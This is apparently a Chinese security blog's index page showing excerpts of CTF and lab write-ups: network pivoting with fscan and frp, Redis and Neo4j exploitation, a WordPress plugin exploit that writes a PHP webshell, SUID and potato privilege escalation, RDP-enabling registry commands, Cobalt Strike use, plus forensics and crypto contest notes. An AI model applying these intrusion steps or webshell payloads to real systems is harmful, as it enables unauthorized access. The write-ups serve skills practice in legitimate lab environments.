St4rr's Blog

fscan扫一遍，发现存在redis未授权漏洞 img 用脚本getshell img 发现没有权限读flag，发现可以利用base64命令suid提权 img img img 传个fscan上去扫一下内网 img 搭建frp img img 先尝试攻击搭建了wordpress的那台主机 wpscan扫一遍，扫出来有个wpcargo插件 img 用脚本写入木马 12345678910111213141516171819202122232425import sysimport binasciiimport requests# This is a magic string that when treated as pixels and compressed using the png# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file ...

Time fscan扫一遍 img 有7687端口，这是neo4j的端口。这里存在CVE-2021-34371未授权RCE，我们可以以此反弹shell img img 拿到flag1和提示kerberos的认证过程 img 上传fscan扫一下，扫出来还有三台主机 img 搭建frp，访问搭建了web服务的那台主机 img img img 这里可以用sqlmap一把梭，找到第二个flag img 读取数据库中的用户表，总共有500个用户，把这些用户的名称都dump下来做成一个字典 img 12345678910import csvinput_csv = 'oa_users.csv'output_txt = 'usernames.txt'with open(input_csv, mode='r', encoding='utf-8') as csvfile: ...

fscan扫出来有mssql数据库，有了账号密码 img 用MUDT连接，先激活一下xpshell组件 img img 上传SweetPotato成功提权 img img 添加用户，开启远程登陆 img img 开启远程桌面 REG ADD HKLMServer /v fDenyTSConnections /t REG_DWORD /d 00000000 /f img 远程桌面连接上，找到第一个flag img 查看ip，上传fscan扫内网 img img 可以看到除了打下来的这台以外还有三台机器，一台域控，两台域内机器。 quser看到还有一个叫做john的用户通过rdp连接了 img netstat查看网络连接状态，看到是来自域内另一个主机 img 到这里歇了歇，下次再做。 上传cs的后门并执行 img 注入进程 img img ...

这次没有得奖（ 做出来了一半的题目，都是各个方向比较基本的题。有一题比较遗憾，由于时间原因倒在了出答案的前一步，不然应该就能拿到奖了（ 这次又成功面基了几位星盟的师傅:) Crypto crypto1 image-20250611141724525 Misc Misc1 找到一个表格 image-20250611145820652 在cmdscan中找到密码 image-20250611145820652 隐藏文字 image-20250611145840515 UTF-7 image-20250611145857308 Crypto Crypto1 指数很小，爆破就行 1234567891011121314from Crypto.Util.number import *import gmpy2n=933132591603649661272081363592225803528096281299294958684014567416493105150760078378922298065 ...

先上fscan扫一遍，扫出thinkphp一个rce的洞 img 用工具，getshell img 写个马进去 img 蚁剑连接 img img 当前用户是www-data，需要提权 发现可以sudo提权，mysql被配置了root权限，去gtfobins上查一下 img img 查找所有名字含flag的文件，找到flag01.txt img img 看下内网ip img 用蚁剑传个fscan上去扫描一下（记得chmod 777 fscan） img 可以看到除了我们打下来的这台主机外，还有三台主机：一台是信呼OA服务器，一台是DC域控，一台是个有永恒之蓝的洞的windows 接下来配置frp转发流量 frpc.ini 12345678[common]serverAddr = "60.204.245.37"serverPort = 7000[socks_proxy]type = tcprem ...

CVE-2022-32991 靶标介绍： 该CMS的welcome.php中存在SQL注入攻击。 随便注册一个账号先登录一下，来到题目所说的welcome.php img 点start可以发现有很多的get参数 img 拿上cookie，用sqlmap能一把梭（） img img img CVE-2022-30887 靶标介绍： 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。 原来似乎可以通过访问网站开发者的个人网站找到其邮箱，现在好像删掉了。 密码则是弱口令，作者名字mayurik 成功登录后，由题目找到Medicine-Manage Medicine下存在文件上传漏洞，直接写一个一句话木马传 ...

237c7b37fdf7fec26f51a8dc4d10e6e5690f222e5e2c25948d9574ab25f1b4d68d6446c5e34e4f112c1d85e203c1fbb46563a71302a8074bb129bcec0aef458e19341d1c0dc38a42ba715fa5b08bd30fa436f81fa2ee7035c351ce921882e3ff62debdfdc978714deb3ee7124698f814fcd02cf5bd9e32e5a70c5d49fb16a81046a34cf4e4ebb24073a8ca2f96a621f2125a3054256a13a396e9ef0009f83a926c311cf5ba38f0cb5a4f85a228ee22c33e1240dcbb4e26aeb5ff1873663f263504d5b8f9ae24590fd7ea2c7acd8965d95f83c7e370b18d891359db3065556439d348e9d0f303fa7d7cdc7e0f940eb62e8e973a76c09f0fa98 ...

这波Aura✌tql，仅凭一己之力干完了应急响应，本菜鸡直接被带飞OrzOrz 比赛的时候根本跟不上aura✌的进度，虽说看了题但是没做几道，现在好好复现一下。 除了应急响应以外的题就不复现了，都是musc。。。 主线 第二届“Parloo”CTF应急响应挑战赛应急响应场景挑战说明手册.pdf 1 提交堡垒机中留下的flag 附件下载地址：百度网盘 https://pan.baidu.com/s/1otqDnpKTOEsPZQiWSE8ECg?pwd=6666 提取码: 6666 夸克网盘 https://pan.quark.cn/s/46653bd06cca 123云盘 https://www.123865.com/s/qDVvjv-zVBod 提取码:6666 **解压密码：应急响应环境解压密码网络拓扑环境 Skills@@@Skills@@@Skills 畸行的爱 Parloo&zgsfsys&onefox&solar**juyt** 登录面板即可看到flag img palu{2025_qiandao_fl ...

这次混了个预赛二等奖，但同样未能成功晋级，菜炸了（（ 唉好好复现学习一下吧 以下是在w8nn9z、1n1t两位爷的帮助下一起尝试完成的复现Orz 服务器取证部分复现起来有点耗时耗力，暂时先搁置了。。。也许等下一次打取证比赛前会想起更新吧（） 数据取证部分在网上没找到标准答案，就不复现了。 手机取证 1 分析安卓手机检材，手机的IMSI是？ img 460036641292715 2 养鱼诈骗投资1000，五天后收益是？ 在QQ聊天记录里可以找到 img 175 3 分析苹果手机检材，手机的IDFA是？ img E477D4C7-BD02-4979-BC9D-5C5DE7BD1F17 4 Telegram应用的卸载时间是？ 过滤卸载记录 img 2025-04-17-10:51:39 5 机主hotmail邮箱地址是？ telegram聊天记录中有提到 img hostsixer@hotmail.com 6 苹果电脑开机密码是？ 在手机截屏里 ...

我们至今仍未知道ISCC主办方的心理，可以说是打过最烂的比赛了，没有之一 虽说有的史很难吃，但是有的题对于本菜狗来说还是能学到点东西的（ 校赛Writeup点我 区域赛Writeup点我 决赛Writeup点我